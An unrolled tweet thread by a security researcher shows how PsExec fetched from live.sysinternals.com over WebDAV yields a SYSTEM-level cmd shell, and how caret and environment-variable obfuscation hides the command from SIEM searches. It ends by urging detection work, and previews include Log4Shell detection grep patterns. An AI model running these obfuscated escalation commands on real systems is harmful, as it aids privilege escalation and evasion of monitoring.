Florian Roth Profile picture
Oct 13, 2021 5 tweets 2 min read Read on X
Elevate your cmd.exe to LOCAL_SYSTEM?

\\live.sysinternals.com\tools\PsExec.exe -s -c cmd.exe

Have you ever seen this being used by an adversary? I haven't but I like it. Image
If you can't use the SMB protocol to hosts on the Internet, try WebDav over HTTPS

net use z: hxxps://live.sysinternals.com/tools && z:\PsExec.exe -s -c cmd.exe

(had to change the URL scheme because twitter would otherwise transform it - see screenshot) Image
And let's add some obfuscation to hide from sloppy signatures or case-sensitive searches in your SIEM

net use z: htT^pS://li^ve.sysInTer^nals.com/toOls && z:\Ps^EXeC.eXe -s c^md.e^xe Image
And we add another layer of obfuscation

net use z: htT^pS://li^ve.sys%SystemRoot:~4,1%nTer^nals.com/toOls && z:\Ps^EX%Public:~5,1%C.eXe -s c^md.e^xe Image
And when we're done with all that kids stuff and decide that we want to do something useful with our life, we check the resulting artefacts, logs, traces and start developing detection for all that evidence to really make a difference

• • •

Missing some Tweet in this thread? You can try to force a refresh
 

Keep Current with Florian Roth

Florian Roth Profile picture

Stay in touch and get notified when new unrolls are available from this author!

Read all threads

This Thread may be Removed Anytime!

PDF

Twitter may remove this content at anytime! Save it as PDF for later use!

Try unrolling a thread yourself!

how to unroll video
  1. Follow @ThreadReaderApp to mention us!

  2. From a Twitter thread mention us with a keyword "unroll"
@threadreaderapp unroll

Practice here first or read more on our help page!

More from @cyb3rops

Feb 24, 2022
I consider disabling my free tools on systems with certain language and time zone settings

e.g. "Russian" language + timezone somewhere within "Russia" > "sorry, I can't run here"

Opinions?
To be fair, the Russian aggression against Ukraine would only be the trigger and not the cause.
We are not allowed to & refrain from selling to certain countries but we give away "Lite" versions for free.
RU's invasion is just the trigger that reminded me of that idea.
I would obviously include China, North Korea and Iran in these filters to treat them equally
Read 5 tweets
Dec 11, 2021
1/ #Log4Shell Status determination

# Block Rules / Log-Based Detection
There's no effective or rather gapless way to detect attacks that use log4shell due to the many ways to obfuscate the strings.
Don't put too much trust in any filter/detection pattern. All can be bypassed.
..
2/ # Behaviour Based Detection

We thought about network based detection, but it could be any remote port and any remote system. Java can have many legitimate outgoing connections & often has suspicious sub processes.
3/ # Vulnerability Detection

It's difficult to find vulnerable software. It could be the web app, the ticket mgmt that receives contact form content or the backup software. Vuln scanners won't give a complete picture.
Discovery could take months.
Try to use the Canary Tokens.
Read 6 tweets
Dec 10, 2021
Quick check in /var/log folder or where your apps store their logs

sudo grep -r '${jndi:ldap://' /var/log

#log4j #log4jrce
If you find something, please send me a redacted version of it - I'd like to see log lines of real world exploitation attempts
Improved version

sudo egrep -i -r '\$\{jndi:(ldap[s]?|rmi)://' /var/log
Read 4 tweets
Aug 1, 2021
I’d like to clarify my position on #Microsoft in general

Many things have improved over the last 10 years .. a lot .. especially with Windows 10/2016.
Today many fellow security researchers that I highly respect work there.

I criticize Microsoft’s response to recent ..
vulnerabilities (or design flaws) because I care about these things and believe that customers do care too.
I don’t think that it is fair / right to tell them to migrate to the cloud-based solution in order to get rid of these issues.

There are still few but good reasons ..
.. not to opt for the cloud.

I strongly believe that weaknesses in default configs that allow an attacker to escalate privs to Domain Admin should be addressed with a KB patch and not just a pointer to an advisory.
Many won’t read it.

I really hope that you continue the ..
Read 4 tweets
Oct 26, 2020
1/ Since we go through the #Githubification of InfoSec, knowing git has become an essential skill

My recommendations:

Read a tutorial to get to know the basic terminology
rogerdudler.github.io/git-guide/

Do an interactive training but I'd consider it optional
katacoda.com/courses/git
2/
For newcomers or occasional users I'd recommend a GUI

- Github Desktop (Windows, Linux, macOS)
desktop.github.com
github.com/shiftkey/deskt…
- SourceTree (macOS, Windows)
sourcetreeapp.com
- GitKraken (Windows, Linux, macOS)
gitkraken.com

...
3/ What you'll need in practice is called "pull requests", often from your own forked version of another repository

docs.github.com/en/free-pro-te…

It goes like this:
1. Create a fork
2. Modify the fork, add files, change content
3. Create pull request for the original repository
Read 5 tweets
Mar 15, 2020
1/x A #COVID19 #OffTopic thread for my followers in countries that still enjoy the quiet before the storm.

It is serious. Don't listen to the voices that play it down.
But also don't panic.

The problem with SARS-CoV-2 is that the treatment of severe cases (~5-10%) require ..
2/x .. intensive care beds with respirators.

Here in Germany, we have 29k intensive care beds, most of them occupied long before COVID19.
If only 1% of the citizens get sick, that would be 830k citizens, 83k of them with the severe clinical course of the disease.
3/x I guess you can imagine what that means.

Italy is about 10 days ahead of us.
Doctors in Italy decide every morning in a so called "triage" who gets a bed with lung ventilator and who doesn't, which is basically a death sentence.
These patients slowly suffocate.
Read 7 tweets

Did Thread Reader help you today?

Support us! We are indie developers!


This site is made by just two indie developers on a laptop doing marketing, support and development! Read more about the story.

Become a Premium Member ($3/month or $30/year) and get exclusive features!

Become Premium

Don't want to be a Premium member but still want to support us?

Make a small donation by buying us coffee ($5) or help with server cost ($10)

Donate via Paypal

Or Donate anonymously using crypto!

Ethereum

0xfe58350B80634f60Fa6Dc149a72b4DFbc17D341E copy

Bitcoin

3ATGMxNzCUFzxpMCHL5sWSt4DVtS8UqXpi copy

Thank you for your support!

Follow Us!

:(